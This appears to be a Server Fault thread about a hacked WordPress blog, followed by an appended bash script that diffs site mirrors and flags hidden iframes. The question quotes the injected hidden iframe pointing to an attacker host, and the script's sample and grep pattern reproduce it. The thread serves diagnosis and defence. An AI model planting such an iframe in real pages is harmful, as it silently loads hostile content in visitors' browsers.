1

Possible Duplicate:
My server's been hacked EMERGENCY

I got this weird page, which I am very sure was not created by me:

<iframe src="http://a.bad.site:8080/ts/in.cgi?pepsi106" width=125 height=125 style="visibility: hidden"></iframe>

Where the hell does it come from? Is this a virus??

My blog site, blog.domain.com, was fine a few weeks back. But now, all of a sudden, when I go visit my blog, it's become a blank page and displays:

This is index.html

Does anyone have any idea how to remove it forever, and prevent it from occurring on my site again?

5 Answers

3

I've seen that sort of iframe embedded before. Someone has definitely hijacked your page and embedded the link. Remove all references to it that you can find, and change ALL your passwords.

Cheapo hosts never like to admit they've been hacked, so I wouldn't expect much help from them.

Mark Henderson
2

It's a cross-site scripting (XSS) attack. Start reading up on them. There are some great screencasts/videos around about this sort of thing too.

The main point is not to be negligent now. Your site has a weakness, which must be found and fixed. Don't blame it on your hosting company either; most likely, it's your own mistake for choosing a bad blog engine, or not keeping a good blog engine up to date with the latest security patches or releases.

Also: you seem to only be aware of "viruses". Cracking a server is nothing to do with viruses. The issue is a vulnerability. Old versions of WordPress do have them --- recently a very bad one, which you should definitely upgrade to patch. You might want to look into automatic security updates for your OS, programs which will email you a list of current vulnerabilities in your servers, and/or subscribe to CVE sites that warn you of all the latest software problems.

At the very least, if you're admining a Linux server/site, subscribe to some Linux admin sites, which post decent articles that teach you new skills and warn of new issues. XSS has been around a long time now.

Lee B
  • I dunno about it exclusively being an XSS. I had a website which was just a single static HTML file and a placeholder image, and it got one of these. And it was the host's fault because every site I could find on their services had one. – Mark Henderson Oct 08 '09 at 20:19
  • Farseeker: Could be the case on some very insecure shared hosting, but any good (virtual) dedicated hosting shouldn't suffer from that sort of insecurity -- only the admin's (i.e. your) own oversights. I HAVE heard of some cheap website hosting companies deliberately putting ads into their clients' sites as a method of making the service pay though. I thought companies doing that had long since been avoided by everyone though, and had died as a result. – Lee B Oct 13 '09 at 21:36
1

In addition to Farseeker's suggestions, follow all of the instructions in this:

Virus Alert community service announcement


For the audio impaired, here is a text version of the message.

Nick Kavadias
0

Remove the "index.html" file from your directory index. It may be that your host switched the index precedence...from index.php (for example) first to index.html.

Xorlev
  • Ok. I removed the index.html. It seems fine now. But, where does that weird file come from? It looks like a virus. I called my hosting company, they said they didn't change the precedence. Weird!! I don't want it to happen again!! But HOW?? –  Oct 08 '09 at 08:01
  • Change your passwords to something secure. If you're still getting issues, then your host needs to fix it. Seeing your edit above, definitely not a friendly file. I would also make sure your blog software is updated to the newest security release. – Xorlev Oct 08 '09 at 08:05
  • I am using WordPress 2.7, the latest should be 2.8 or something. So frustrating.. I have scanned my computer, no viruses detected. –  Oct 08 '09 at 08:11
  • Not your computer necessarily, but an exploit in the blogging software or something else. – Xorlev Oct 08 '09 at 08:32
  • There is a big exploit in all versions of WordPress below 2.8.4 (I think) that is very easy to exploit. You should upgrade to 2.8.4 ASAP. – mrdenny Oct 08 '09 at 18:44
0

As others have already sufficiently covered what to do about your little problem, the most important point of course being to do some learning, I won't duplicate their efforts. I will however add that you need to monitor your site. Clearly the hack could have taken place any time over a number of weeks, yet you were unaware of it.

There are many ways to automatically monitor a site for changes and you will need to choose a method that will work with your host's system. In case you're stuck for ideas, the method I employ is a shell script running on a local machine to do the following each night:

  • Mirror the entire site using wget (rsync is not available to me)
  • Call a Perl script which parses the log, ignoring selected items such as cache directories and files, building a list of any changes. If any changes are detected that list is emailed to me.
  • Call another script which recursively parses the .listing files and removes any local files and directories which no longer exist on the server.
  • Rename older archives of the site such that the previous 9 are kept and archive the current version.
John Gardeniers
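
The nightly change check described in this answer, as an added example that is not part of the original thread and is not the answerer's own script: it compares two mirror snapshots by SHA-256, ignores cache directories and wget `.listing` files, and also flags any file carrying a hidden iframe like the one in the question. GNU find/xargs/sha256sum, the snapshot directory layout, the ignore pattern, the function names and the sample files are all assumptions made for the example.

```shell
#!/usr/bin/env bash
# Added example; GNU find/xargs/sha256sum assumed. Snapshot layout, ignore
# pattern and function names are assumptions, not the answerer's own script.
IGNORE='/(cache|tmp)/|/\.listing$'   # cache dirs and wget .listing files

# Emit "<sha256>  <path>" for each file in a snapshot, minus ignored paths.
manifest() {
    ( cd "$1" && find . -type f -print0 | sort -z | xargs -0 -r sha256sum ) |
        grep -Ev "$2" || true
}

# Report files ADDED, CHANGED or REMOVED between two mirror snapshots.
# Hashes are compared, so a same-size edit is still caught.
site_changes() {
    local old="$1" new="$2" ignore="${3:-$IGNORE}"
    { manifest "$old" "$ignore" | sed 's/^/O /'
      manifest "$new" "$ignore" | sed 's/^/N /'; } |
    awk '{ tag = $1; sum = $2; sub(/^[^ ]+ [^ ]+  /, ""); path = $0 }
         tag == "O"      { seen[path] = sum; next }
         !(path in seen) { print "ADDED " path; next }
         { if (seen[path] != sum) print "CHANGED " path; delete seen[path] }
         END { for (p in seen) print "REMOVED " p }' | sort
}

# List files carrying a hidden iframe like the one shown in the question.
hidden_iframes() {
    ( cd "$1" && grep -rliE '<iframe[^>]*(visibility: *hidden|display: *none)' . ) | sort
}

# Constructed sample: yesterday's and today's mirror of a small blog.
demo() {
    local t; t=$(mktemp -d)
    mkdir -p "$t/old/wp-content/cache" "$t/new/wp-content/cache"
    echo '<?php /* blog */' | tee "$t/old/index.php" > "$t/new/index.php"
    echo 'about v1' > "$t/old/about.html"; echo 'about v2' > "$t/new/about.html"
    echo 'User-agent: *' > "$t/old/robots.txt"
    echo 'c1' > "$t/old/wp-content/cache/p"; echo 'c2' > "$t/new/wp-content/cache/p"
    echo '<iframe src="http://bad.example:8080/x" style="visibility: hidden"></iframe>' \
        > "$t/new/index.html"
    site_changes "$t/old" "$t/new"
    echo "HIDDEN-IFRAME $(hidden_iframes "$t/new")"
    rm -rf "$t"
}
```

Run `site_changes` against last night's and tonight's mirror from cron and mail the output only when it is non-empty; file names containing newlines are not handled.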